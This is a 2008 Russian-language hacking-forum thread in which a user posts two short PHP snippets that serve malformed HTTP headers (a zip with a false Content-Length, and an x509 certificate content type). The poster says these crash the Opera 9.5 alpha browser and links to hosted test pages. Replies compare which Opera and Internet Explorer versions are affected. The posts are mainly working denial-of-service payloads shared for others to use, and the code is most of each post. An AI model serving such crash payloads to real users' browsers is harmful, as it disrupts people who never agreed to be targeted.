Opera 9.5 Alpha DoS Exploit

Discussion in 'Безопасность и Анонимность' started by _kREveDKo_, 12 Mar 2008.

  1. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    Opera 9.5 (alpha) DoS

    Наткнулся случайно
    PHP:
    <?php
    header
    ("HTTP/1.1 200 OK\n");
    header("Content-Length: 56862\n");
    header("Content-Type: application/x-zip-compressed\n");
    header("Last-Modified: Mon, 04 Jun 2007 13:16:24 GMT\n");
    header("Accept-Ranges: bytes\n");
    header("ETag: \"408f158daaa6c71:496\"\n");
    header("Date: Wed, 12 Mar 2008 10:02:34 GMT\n");
    ?>
    Протестить:
    http://b00zy.netsec.ru/dos.php

    Поверил бру, что на 9.26 не пашет, тестим дальше...
    8.5, 9.0, 9.25 тоже не подвержены
     
    #1 _kREveDKo_, 12 Mar 2008
    Last edited: 12 Mar 2008
    4 people like this.
  2. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    Проверил бы (у меня 9.50 бетка), но если кто подскажет, как удалить плагин от регета к опере..Вроде удалял, но урл все равно передается к регету и краш происходит(( мучаюсь так давно(
     
  3. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    542
    Reputations:
    445
    анинсталь софт. или попробуй то гугл HijackThis и в ней удаляй все висящие в фоне "заразы"
     
  4. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    цуки! у кого-нить хоть кроме меня работает? ))
     
  5. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    Мммм.. оказалось, что ентот баг присутствует только в ПОРТАБЛ верси этой оперы альфы...

    А вот терь я поставил обычную версию 9.5 альфа и... баг не работает, но нашёл новый денай оф сервис со след. пакетом:

    http://b00zy.netsec.ru/dos2.php

    PHP:
    <?php header("HTTP/1.1 200 OK\n");
    header("Content-Type: application/x-x509-ca-cert\n");
    ?>
    На 9.26 и 8.5 не работает.. ребят, попрошу активнее, надо тестить!
     
    1 person likes this.
  6. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    ie 7 редлагает сохранить сертификат. мозила даже на ссылку не переходит)
     
  7. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    да и ie 6.0 собственно так же как и 7. у оперы глюк какой-то с сертификатами
     
  8. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    Спущено в паблик
     
  9. AHTOLLlKA

    AHTOLLlKA Member

    Joined:
    1 Feb 2005
    Messages:
    225
    Likes Received:
    35
    Reputations:
    22
    дос2 работает на:
     
    1 person likes this.
  10. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    билд Build 9500 тоже подвержен
     
  11. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    Свежий релиз данному косяку не подвержен.
     
  12. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Ога, свежий релиз и без эксплойтов замечательно уходит в даун